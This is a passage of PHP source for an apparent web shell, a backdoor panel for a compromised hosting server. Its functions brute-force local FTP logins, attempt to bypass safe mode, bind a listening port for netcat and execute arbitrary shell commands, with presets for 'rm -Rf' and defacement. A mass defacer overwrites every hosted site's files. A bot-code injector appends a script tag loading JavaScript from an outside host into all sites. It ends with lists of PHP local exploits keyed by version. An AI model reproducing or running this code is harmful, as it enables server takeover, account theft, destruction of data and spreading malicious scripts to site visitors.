  750.         $chkdun = (isset($_POST['all_usernames'])) ? " checked=\"checked\"" : "" ;
  751.         $chkdpw = (isset($_POST['password_equal_username'])) ? " checked=\"checked\"" : "" ;
  752.  
  753.         echo('<form method="post" action="?act=ftp">');
  754.         echo('<u>Usernames:</u><br />');
  755.         echo('<input type="checkbox" id="all_usernames" name="all_usernames"'.$chkdun.' /> All usernames in the server<br />');
  756.         echo('<strong>OR</strong><br />');
  757.         echo('Specific usernames:<br />');
  758.         echo('<textarea rows="5" cols="50" id="usernames" name="usernames" />'.$_POST['usernames'].'</textarea><br />');
  759.         echo('<br />');
  760.         echo('<u>Passwords:</u><br />');
  761.         echo('<input type="checkbox" id="password_equal_username" name="password_equal_username"'.$chkdpw.' /> The username is the password.<br />');
  762.         echo('Specific passwords:<br />');
  763.         echo('<textarea rows="5" cols="50" id="passwords" name="passwords" />'.$_POST['passwords'].'</textarea><br /><br />');
  764.         echo('<input type="submit" id="submit" name="submit" value="Start" />');
  765.         echo('</form>');
  766.  
  767.         if(isset($_POST['submit'])){
  768.             echo('<br /><br /><u>Results:</u><br />');
  769.             if(function_exists("fsockopen") and is_callable("fsockopen")){
  770.                 $start = time();
  771.                 $host = "127.0.0.1";
  772.                 $port = "21";
  773.  
  774.                 $usernames = explode("\r\n",$_POST['usernames']);
  775.                 $passwords = explode("\r\n",$_POST['passwords']);
  776.  
  777.                 if(isset($_POST['all_usernames'])){
  778.                     if(function_exists("posix_getpwuid") and is_callable("posix_getpwuid")){
  779.                         $usernames = array();
  780.                         $number = ($_POST['end'] > 0) ? $_POST['end'] : "5000";
  781.  
  782.                         for($x=0;$x<$number;$x++){
  783.                             $user = posix_getpwuid($x);
  784.                             if(strlen($user[name]) > 0)
  785.                                 $usernames[] = $user[name];
  786.                         }
  787.                     }
  788.                     else{
  789.                         echo("Unable to get usernames list.<br />");
  790.                     }
  791.                 }
  792.  
  793.                 $usernames_count = count($usernames);
  794.                 $passwords_count = count($passwords);
  795.                 $results = 0;
  796.  
  797.                 foreach($usernames as $user){
  798.                     if(isset($_POST['password_equal_username']))
  799.                         $passwords['user'] = $user;
  800.  
  801.                     foreach($passwords as $pass){
  802.                         $sock = @fsockopen($host, $port, $errno, $errstr, 10);
  803.                         $get = @fgets($sock, 150);
  804.                         @fputs($sock, "USER " .$user. "\n");
  805.                         $get = @fgets($sock, 150);
  806.                         @fputs($sock, "PASS " .$pass. "\n");
  807.                         $get = @fgets($sock, 150);
  808.  
  809.                         if(strstr($get, "logged")){
  810.                             $results++;
  811.  
  812.                             echo "Username: ".$user." Password: ".$pass."<br />\n";
  813.                             @fclose($sock);
  814.                         }
  815.                         else{
  816.                             @fclose($sock);
  817.                         }
  818.  
  819.                         @fclose($sock);
  820.                     }
  821.                 }
  822.                 $finish = time();
  823.                 $seconds = number_format($finish-$start);
  824.  
  825.                 //Statistics
  826.                 echo("<br /><u>Statistics:</u><br />Checked Accounts: {$usernames_count}<br />\nChecked Passwords: {$passwords_count}<br />\nHacked Accounts: {$results}<br />\nScan Time: {$seconds} seconds<br />\n");
  827.             }
  828.             else{
  829.                 echo("Unable to start scanning.<br />");
  830.             }
  831.         }
  832.     }
  833.  
  834.     function PassServerProtections(){
  835.         echo("<span class=\"PageTitle\">Pass Server Protections (Safe Mode & Open Base Dir)</span><br /><br />");
  836.  
  837.         if(eregi("off",strtolower($this->SafeModeStatus())) and eregi("off",strtolower($this->OpenBaseDirStatus()))){
  838.             echo("The safe mode and the open base dir are off.");
  839.         }
  840.         else{
  841.             $inSafeMode = "<span class=\"ServerInfoTitle\">Safe Mode:</span> <span style=\"color:green;font-weight:Bold;\">Off</span><br />";
  842.             $inOpenBaseDir = "<span class=\"ServerInfoTitle\">Open BaseDir:</span> <span style=\"color:green;font-weight:Bold;\">Off</span><br />";
  843.             if(function_exists("posix_getpwuid") and is_callable("posix_getpwuid")){
  844.                 if(function_exists("get_current_user") and is_callable("get_current_user")){
  845.                     $details = posix_getpwuid(get_current_user());
  846.                     $user = $details['user'];
  847.                 }
  848.                 else{
  849.                     if(function_exists("getmyuid") and is_callable("getmyuid")){
  850.                         $details = posix_getpwuid(getmyuid());
  851.                         $user = $details['user'];
  852.                     }
  853.                 }
  854.             }
  855.  
  856.             if(strlen($user) <= 0 and eregi("/home/",$_SERVER['DOCUMENT_ROOT']) and eregi("/domains/",$_SERVER['DOCUMENT_ROOT'])){
  857.                 $explode = explode("/",$_SERVER['DOCUMENT_ROOT']);
  858.                 $user = $explode[2];
  859.             }
  860.  
  861.             if(strlen($user) > 0){
  862.                 echo("Trying to pass this server protections...");
  863.                 $url = "http://".$_SERVER['SERVER_ADDR']."/~".$user."/".$_SERVER['SCRIPT_NAME']."?act=info";
  864.                 $source = file_get_contents($url);
  865.  
  866.                 if(eregi($inSafeMode,$source))
  867.                     $safemode = "<span style=\"color:green;font-weight:Bold;\">Passed</span><br />\n";
  868.                 else
  869.                     $safemode = "<span style=\"color:red;font-weight:Bold;\">Not Passed</span><br />\n";
  870.  
  871.  
  872.                 if(eregi($inOpenBaseDir,$source))
  873.                     $openbasedir = "<span style=\"color:green;font-weight:Bold;\">Passed</span><br />\n";
  874.                 else
  875.                     $openbasedir = "<span style=\"color:red;font-weight:Bold;\">Not Passed</span><br />\n";
  876.  
  877.                 if(eregi("green",$safemode) or eregi("green",$openbasedir)){
  878.                     echo("<span style=\"color:green;font-weight:Bold;\">Done!</span><br /><br />\n");
  879.                     echo("Safe Mode: ".$safemode);
  880.                     echo("Open Base Dir: ".$openbasedir);
  881.                     echo("<br /><a href=\"".$url."\">CLICK HERE TO PASS</a><br />\n");
  882.                 }
  883.                 else{
  884.                     echo("<span style=\"color:red;font-weight:Bold;\">Failed!</span><br />\n");
  885.                 }
  886.             }
  887.             else{
  888.                 echo("Unable to get this account username");
  889.             }
  890.         }
  891.     }
  892.  
  893.     function BackConnection(){
  894.         $port = (isset($_POST['port']) and is_numeric($_POST['port'])) ? $_POST['port'] : "1337" ;
  895.  
  896.         echo("<span class=\"PageTitle\">Bind Back Connections</span><br /><br />");
  897.         echo("Bind the port and than run this in your netcat: nc ".$_SERVER['SERVER_ADDR']." <span id=\"backconnport\">1337</span><br /><br />");
  898.         echo("<form method=\"post\" action=\"?act=back\">Port: <input type=\"text\" id=\"port\" name=\"port\" value=\"".$port."\" onkeyup=\"javascript:if(document.getElementById('port').value > 0) document.getElementById('backconnport').innerHTML=this.value; else document.getElementById('backconnport').innerHTML='1337';\" maxlength=\"6\" /> <input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Bind\" /></form><br />");
  899.  
  900.         if(isset($_POST['submit'])){
  901.             $address = $_SERVER['SERVER_ADDR'];
  902.             $mysock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  903.             socket_bind($mysock, $address, $port) or die("Error: Can't bind to <" .$address. ":" .$port. ">\n");
  904.             socket_listen($mysock, 5);
  905.             $client = socket_accept($mysock);
  906.             socket_write($client, "-= PHP Bindshell =-\n");
  907.             while(1){
  908.                 socket_write($client, "> ");
  909.                 $input = socket_read($client, 1024);
  910.                 if(trim($input) == "quit") break;
  911.                     socket_write($client, $input);
  912.             }
  913.             socket_close($client);
  914.             socket_close($mysock);
  915.         }
  916.     }
  917.  
  918.     function CommandExecute(){
  919.         ob_start();
  920.  
  921.         $cmd = stripslashes($_POST['code']);
  922.         $result = "<span class=\"PageTitle\">Commands Execution</span><br /><br />\n";
  923.         $result .= "<table style=\"width:100%;\">\n<tr>\n<td style=\"vertical-align:top;width:550px;\">\n";
  924.         $result .= "<form method=\"post\" action=\"?act=cmdexec\">\n";
  925.         $result .= "Command:<br />\n";
  926.         $result .= "<textarea rows=\"5\" cols=\"50\" id=\"code\" name=\"code\">".htmlspecialchars($cmd)."</textarea><br />\n";
  927.         $result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Execute\" /><br />\n</form>\n";
  928.  
  929.         if(isset($_POST['code'])){
  930.             $result .= "<br />";
  931.             $list = array("system","shell_exec","passthru","exec",);
  932.             foreach($list as $func)
  933.                 if(function_exists($func) and is_callable($func)){
  934.                     $chosen = "yes";
  935.  
  936.                     if($func($cmd)){
  937.                         break;
  938.                     }
  939.                 }
  940.  
  941.             if($chosen != "yes"){
  942.                 $result .= "Unable to execute commands on this server.";
  943.             }
  944.             else{
  945.                 $eresult = ob_get_contents();
  946.                 $res = (strlen($eresult) > 0) ? $eresult : $func($cmd) ;
  947.  
  948.                 if($res == "")
  949.                     $result .= "Your command didn't return results.";
  950.                 else
  951.                     $result .= "Results:<br /><textarea rows=\"20\" cols=\"50\">".$res."</textarea><br />";
  952.             }
  953.         }
  954.  
  955.         ob_end_clean();
  956.  
  957.         $result .= "</td>\n<td style=\"vertical-align:top;\">\n";
  958.         $result .= "<u>Useful Commands:</u><br />\n";
  959.         $result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='netstat -an | grep -i listen';\">View Open Ports</a><br />\n";
  960.         $result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='cut -d: -f1,2,3 /etc/passwd | grep ::';\">Find Users Without Password</a><br />\n";
  961.         $result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='cat /proc/version /proc/cpuinfo';\">View CPU Information</a><br />\n";
  962.         $result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='find / -perm -2 -ls';\">Find All Writeable Files & Folders</a><br />\n";
  963.         $result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='tar -cvf [BackupFileName].tar -c /home/[USER]/domains/[DOMAIN]/public_html/[FOLDER]';\">Create Backup File</a><br />\n";
  964.         $result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='rm -Rf';\">Run Format Box</a><br />\n";
  965.         $result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='perl [Perl File]';\">Run Perl Script</a><br />\n";
  966.         $result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='sed -i -e \'s/Owned by Pr0T3cT10n & Hyp3rInj3cT10n/g\' index.*';\">Mass Deface</a><br />\n";
  967.         $result .= "</td>\n</tr>\n</table>\n";
  968.  
  969.         return $result;
  970.     }
  971.  
  972.     function ViewPHPInfo(){
  973.         $result = "<span class=\"PageTitle\">PHP Information</span><br /><br />";
  974.         $result .= "Can't run phpinfo function because it blocked by the server.<br />";
  975.         $result .= "Building new function...<br /><br />";
  976.  
  977.         if(function_exists("ini_get_all") and is_callable("ini_get_all")){
  978.             $result .= "<center>\n<h2>PHP Core</h2>\n<div><table style=\"width:100%;\">\n<tr>\n<th>Directive</th><th>Local Value</th><th>Master Value</th><th>Access</th>\n</tr>\n";
  979.  
  980.             foreach(ini_get_all() as $key=>$each_ini){
  981.                 $row = "";
  982.                 $explode = explode(".",$key);
  983.                 $each_ini['local_value'] = GenerateColors($each_ini['local_value']);
  984.                 $each_ini['global_value'] = GenerateColors($each_ini['global_value']);
  985.  
  986.                 if(isset($explode[1])){
  987.                     if($explode[0] != $last_module){
  988.                         $categories .= "</table></div><br /><br />\n";
  989.                         $categories .= "<div style=\"background-color:#3d0303;\">";
  990.                         $categories .= "<h2>".$explode[0]."</h2>\n";
  991.                         $categories .= "<table style=\"width:100%;\">\n";
  992.                         $categories .= "<tr>\n<th>Directive</th>\n<th>Local Value</th>\n<th>Master Value</th><th>Access</th>\n</tr>\n";
  993.                         $categories .= "<tr>\n<td>".$explode[1]."</td>\n";
  994.                         $categories .= "<td>".$each_ini['local_value']."</td>\n<td>".$each_ini['global_value']."</td>\n<td>".$each_ini['access']."</td>\n";
  995.                         $categories .= "</tr>\n";
  996.  
  997.                         $last_module = $explode[0];
  998.                     }
  999.                     else{
  1000.                         $categories .= "<tr>\n<td>".$explode[1]."</td>\n";
  1001.                         $categories .= "<td>".$each_ini['local_value']."</td>\n<td>".$each_ini['global_value']."</td>\n<td>".$each_ini['access']."</td>\n";
  1002.                         $categories .= "</tr>\n";
  1003.                     }
  1004.                 }
  1005.                 else{
  1006.                     $row .= "<tr>\n<td>".$key."</td>\n";
  1007.                     $row .= "<td>".$each_ini['local_value']."</td>\n<td>".$each_ini['global_value']."</td>\n<td>".$each_ini['access']."</td>\n";
  1008.                     $row .= "</tr>\n";
  1009.                 }
  1010.  
  1011.                 $result .= $row;
  1012.                 $count++;
  1013.             }
  1014.  
  1015.             $result .= "</table><br />";
  1016.         }
  1017.  
  1018.         $result .= "<hr /><br /><h2>apache2handler</h2><table cellpadding=\"3\" style=\"width:100%;\">";
  1019.  
  1020.         if(function_exists("create_connection_status") and is_callable("create_connection_status"))
  1021.             $result .= "<tr><td>Connection Status </td><td>".create_connection_status()."</td></tr>";
  1022.  
  1023.         if(function_exists("apache_get_version") and is_callable("apache_get_version"))
  1024.             $result .= "<tr><td>Apache Version </td><td>".apache_get_version()."</td></tr>";
  1025.  
  1026.         if(isset($_SERVER['SERVER_ADMIN']))
  1027.             $result .= "<tr><td>Server Administrator </td><td>".$_SERVER['SERVER_ADMIN']."</td></tr>";
  1028.  
  1029.         if(isset($_SERVER['SERVER_ADDR']) and isset($_SERVER['SERVER_PORT']))
  1030.             $result .= "<tr><td>Hostname:Port </td><td>".$_SERVER['SERVER_ADDR'].":".$_SERVER['SERVER_PORT']."</td></tr>";
  1031.  
  1032.         if(function_exists("apache_get_modules") and is_callable("apache_get_modules")){
  1033.             $result .= "<tr><td>Loaded Modules </td><td>";
  1034.  
  1035.             foreach(apache_get_modules() as $module){
  1036.                 if($count_modules == "10")
  1037.                     $result .= "<br />";
  1038.  
  1039.                 $result .= $module;
  1040.  
  1041.                 if($count_modules == count($apache_modules)-1)
  1042.                     $result .= ".";
  1043.                 else
  1044.                     $result .= ", ";
  1045.  
  1046.                 $count_modules++;
  1047.             }
  1048.  
  1049.             $result .= "</td></tr></table><br />";
  1050.         }
  1051.  
  1052.         $result .= "<hr /><br /><h2>HTTP Headers Information</h2>";
  1053.         $result .= "<table cellpadding=\"3\" style=\"width:100%;\">";
  1054.  
  1055.         if(function_exists("apache_request_headers") and is_callable("apache_request_headers")){
  1056.             $result .= "<tr><th colspan=\"2\">HTTP Request Headers</th></tr>";
  1057.  
  1058.             foreach (apache_request_headers() as $header => $value)
  1059.                 $result .= "<tr>\n<td>{$header}</td>\n<td>{$value}</td>\n</tr>\n";
  1060.         }
  1061.  
  1062.         if(function_exists("apache_response_headers") and is_callable("apache_response_headers")){
  1063.             $result .= "<tr><th colspan=\"2\">HTTP Response Headers</th></tr>";
  1064.  
  1065.             foreach (apache_response_headers() as $header => $value)
  1066.                 $result .= "<tr>\n<td>{$header}</td>\n<td>{$value}</td>\n</tr>\n";
  1067.         }
  1068.  
  1069.         $result .= "</table><br /><hr /><br /><h2>Variables</h2><table style=\"width:100%;\"><tr><th>Variable</th><th>Value</th></tr>";
  1070.  
  1071.         foreach($_SERVER as $server_key=>$server_value){
  1072.             if(is_array($server_value)){
  1073.                 $result .= "<tr>\n<td>_SERVER['".$server_key."']</td>\n<td><input type=\"text\" style=\"width:500px;\" value=\"";
  1074.                 htmlspecialchars(print_r($server_value,true));
  1075.                 $result .= "\" /></td>\n</tr>\n";
  1076.             }
  1077.             else
  1078.                 $result .= "<tr>\n<td>_SERVER['".$server_key."']</td>\n<td><input type=\"text\" style=\"width:500px;\" value=\"".htmlspecialchars($server_value)."\" /></td>\n</tr>\n";
  1079.         }
  1080.  
  1081.         foreach($_ENV as $env_key=>$env_value)
  1082.             $result .= "<tr>\n<td>_ENV['".$env_key."']</td>\n<td><input type=\"text\" style=\"width:500px;\" value=\"".htmlspecialchars($env_value)."\" /></td>\n</tr>\n";
  1083.  
  1084.         $result .= $categories."</table><br /></center>";
  1085.  
  1086.         return $result;
  1087.     }
  1088.  
  1089.     function MassDefacer(){
  1090.         if(isset($_POST['submit']) && isset($_POST['message'])){
  1091.             $result .= "defacing..<br>\n";
  1092.             $myFile = "/etc/virtual/domainowners";
  1093.             $fh = @fopen($myFile, "r");
  1094.             $theData = @fread($fh, filesize($myFile));
  1095.             @fclose($fh);
  1096.             $thedata = explode("<br />", nl2br($theData));
  1097.             foreach($thedata as $user){
  1098.                 $path = explode(": ",$user);
  1099.                 $path[1] = "/home/" .$path[1]. "/public_html/";
  1100.                 if(is_dir($path[1])){  
  1101.                     foreach(array("htm", "html", "shtml", "css", "php", "js", "txt", "inc") as $extension){
  1102.                         foreach(glob($path[1]. "*." .$extension) as $injectj00){
  1103.                             $fp = @fopen($injectj00, "w");
  1104.                             if(@fputs($fp, $_POST['message']))
  1105.                                 $result .= "<font color=\"green\">" .$injectj00. " was injected</font><br>\n";
  1106.                             else
  1107.                                 $result .= "<font color=\"white\">failed to inject " .$injectj00. "</font><br>\n";
  1108.                         }
  1109.                     }
  1110.                 }
  1111.                 else
  1112.                     $result .= "<b><font color=\"white\">" .$path[1]. " is not available!</font></b><br>\n";
  1113.             }
  1114.         }
  1115.         else{
  1116.             $result = "<span class=\"PageTitle\">Mass Defacer</span><br /><br />";
  1117.             $result .= "<form method=\"post\" action=\"?act=mass\">\nMessage: (You can use HTML)<br />\n";
  1118.             $result .= "<textarea rows=\"5\" cols=\"50\" id=\"message\" name=\"message\">".htmlspecialchars($deface)."</textarea><br />";
  1119.             $result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Start\" /></form><br /><br /><small>Built By L[s]D</small>";
  1120.         }
  1121.        
  1122.         return $result;
  1123.    
  1124.     }
  1125.    
  1126.     function BotCode(){
  1127.         if(isset($_POST['submit'])){
  1128.             $result .= "injecting..<br>\n";
  1129.             $myFile = "/etc/virtual/domainowners";
  1130.             $fh = @fopen($myFile, "r");
  1131.             $theData = @fread($fh, filesize($myFile));
  1132.             @fclose($fh);
  1133.             $thedata = explode("\n", $theData);
  1134.             foreach($thedata as $user){
  1135.                 $path = explode(": ",$user);
  1136.                 $path[1] = "/home/" .$path[1]. "/domains/".$path[0]."/public_html/".$_POST['dir_to_inject']."/";
  1137.                 if(is_dir($path[1])){  
  1138.                     foreach(array("htm", "html", "shtml", "css", "php", "js", "txt", "inc") as $extension){
  1139.                         foreach(glob($path[1]. "*." .$extension) as $injectj00){
  1140.                             $fp = @fopen($injectj00, "a+");
  1141.                             if(@fputs($fp, "<? if(\$_REQUEST['CODE']==\"\") echo \"<script src='http://www.planetnana.co.il/shin271/_uacct.js'></script>\"; ?>"))
  1142.                                 $result .= "<font color=\"green\">" .$injectj00. " was injected</font><br>\n";
  1143.                             else
  1144.                                 $result .= "<font color=\"white\">failed to inject " .$injectj00. "</font><br>\n";
  1145.                         }
  1146.                     }
  1147.                 }
  1148.                 else
  1149.                     $result .= "<b><font color=\"white\">" .$path[1]. " is not available!</font></b><br>\n";
  1150.             }
  1151.         }
  1152.         else{
  1153.             $result = "<span class=\"PageTitle\">Bot Code Injection</span><br /><br />";
  1154.             $result .= "<form method=\"post\" action=\"?act=bot\">\nInject To Dir<br />\n";
  1155.             $result .= "<input type=\"text\" name=\"dir_to_inject\" value=\"".htmlspecialchars($dir_to_inject)."\"><small> eg. forum <b>or</b> ipb</small><br />";
  1156.             $result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Start\" /></form><br /><br /><small>Built By L[s]D</small>";
  1157.         }
  1158.        
  1159.         return $result;
  1160.    
  1161.     }
  1162.    
  1163.     function UHNav(){
  1164.         $myFile = "/etc/virtual/domainowners";
  1165.         $fh = @fopen($myFile, "r");
  1166.         $theData = @fread($fh, filesize($myFile));
  1167.         @fclose($fh);
  1168.         $thedata = explode("\n", $theData);
  1169.         foreach($thedata as $user){
  1170.             $path = explode(": ",$user);
  1171.             $result .= "<a href=\"?act=list&dir=/home/".$path[1]."/domains/".$path[0]."/public_html/\">".$path[1]."</a> <br />";
  1172.         }
  1173.         return $result;
  1174.     }
  1175.  
  1176.     function ViewPHPBugs(){
  1177.         $ver = $this->phpv;
  1178.         $result = "<span class=\"PageTitle\">View PHP Bugs</span><br /><br />";
  1179.  
  1180.         $version["5.2.4"] = array(
  1181.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1182.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1183.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1184.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1185.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1186.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC",
  1187.                     "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1188.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
  1189.                     "PHP Perl Extension Safe_mode Bypass Exploit",
  1190.                     "PHP 5.x COM functions safe_mode and disable_function bypass",
  1191.                     "PHP 5.2.4 ionCube extension safe_mode / disable_functions Bypass"
  1192.                 );
  1193.         $version["5.2.3"] = array(
  1194.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1195.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1196.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1197.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1198.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1199.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC",
  1200.                     "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1201.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
  1202.                     "PHP Perl Extension Safe_mode Bypass Exploit",
  1203.                     "PHP 5.x COM functions safe_mode and disable_function bypass",
  1204.                     "PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability",
  1205.                     "PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC",
  1206.                     "PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit",
  1207.                     "PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)",
  1208.                     "PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit (EDI)",
  1209.                     "PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass",
  1210.                     "PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit",
  1211.                     "PHP 5.2.3 glob() Denial of Service Exploit",
  1212.                     "PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit",
  1213.                     "PHP 5.2.3 Tidy extension Local Buffer Overflow Exploit"
  1214.                 );
  1215.         $version["5.2.1"] = array(
  1216.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1217.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1218.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1219.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1220.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1221.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC",
  1222.                     "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1223.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
  1224.                     "PHP Perl Extension Safe_mode Bypass Exploit",
  1225.                     "PHP 5.x COM functions safe_mode and disable_function bypass",
  1226.                     "PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit",
  1227.                     "PHP < 4.4.5 / 5.2.1 _SESSION Deserialization Overwrite Exploit",
  1228.                     "PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit",
  1229.                     "PHP 5.2.1 unserialize() Local Information Leak Exploit",
  1230.                     "PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit",
  1231.                     "PHP <= 5.2.1 hash_update_file() Freed Resource Usage Exploit",
  1232.                     "PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit",
  1233.                     "PHP <= 5.2.1 session_regenerate_id() Double Free Exploit",
  1234.                     "PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA Private-Key Disclosure Exploit",
  1235.                     "PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit",
  1236.                     "PHP < 4.4.5 / 5.2.1 php_binary Session Deserialization Information Leak",
  1237.                     "PHP <= 5.2.1 substr_compare() Information Leak Exploit",
  1238.                     "5.2.1 WDDX Session Deserialization Information Leak",
  1239.                     "PHP 5.2.0/5.2.1 Rejected Session ID Double Free Exploit"
  1240.                 );
  1241.         $version["5.2.0"] = array(
  1242.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1243.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1244.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1245.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1246.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1247.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC",
  1248.                     "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1249.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
  1250.                     "PHP Perl Extension Safe_mode Bypass Exploit",
  1251.                     "PHP 5.x COM functions safe_mode and disable_function bypass",
  1252.                     "PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)",
  1253.                     "PHP <= 5.2.0 (php_win32sti) Local Buffer Overflow PoC (win32)",
  1254.                     "PHP 5.2.0 header() Space Trimming Buffer Underflow Exploit (MacOSX)",
  1255.                     "PHP 5.2.0 / PHP with PECL ZIP <= 1.8.3 zip:// URL Wrapper BoF Exploit",
  1256.                     "PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit",
  1257.                     "PHP 5.2.0 ext/filter Space Trimming Buffer Underflow Exploit (MacOSX)",
  1258.                     "PHP 5.2.0/5.2.1 Rejected Session ID Double Free Exploit"
  1259.                 );
  1260.         $version["4.4.7"] = array(
  1261.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1262.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1263.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1264.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1265.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1266.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC",
  1267.                     "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1268.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
  1269.                     "PHP Perl Extension Safe_mode Bypass Exploit",
  1270.                     "PHP 5.x COM functions safe_mode and disable_function bypass",
  1271.                     "PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability"
  1272.                 );
  1273.         $version["4.4.6"] = array(
  1274.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1275.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1276.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1277.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1278.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1279.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC",
  1280.                     "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1281.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
  1282.                     "PHP Perl Extension Safe_mode Bypass Exploit",
  1283.                     "PHP 5.x COM functions safe_mode and disable_function bypass",
  1284.                     "PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit",
  1285.                     "PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit",
  1286.                     "PHP <= 4.4.6 ibase_connect() Local Buffer Overflow Exploit",
  1287.                     "PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit",
  1288.                     "PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability",
  1289.                     "PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC",
  1290.                     "PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC",
  1291.                     "PHP 4.4.6 snmpget() object id Local Buffer Overflow Exploit PoC"
  1292.                 );
  1293.         $version["4.3.7"] = array(
  1294.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1295.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1296.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1297.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1298.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1299.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC",
  1300.                     "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1301.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
  1302.                     "PHP Perl Extension Safe_mode Bypass Exploit",
  1303.                     "PHP 5.x COM functions safe_mode and disable_function bypass",
  1304.                     "PHP < 4.4.5 / 5.2.1 php_binary Session Deserialization Information Leak"
  1305.                 );
  1306.         $version["4.4.5"] = array(
  1307.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1308.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1309.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1310.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1311.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1312.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC",
  1313.                     "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1314.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
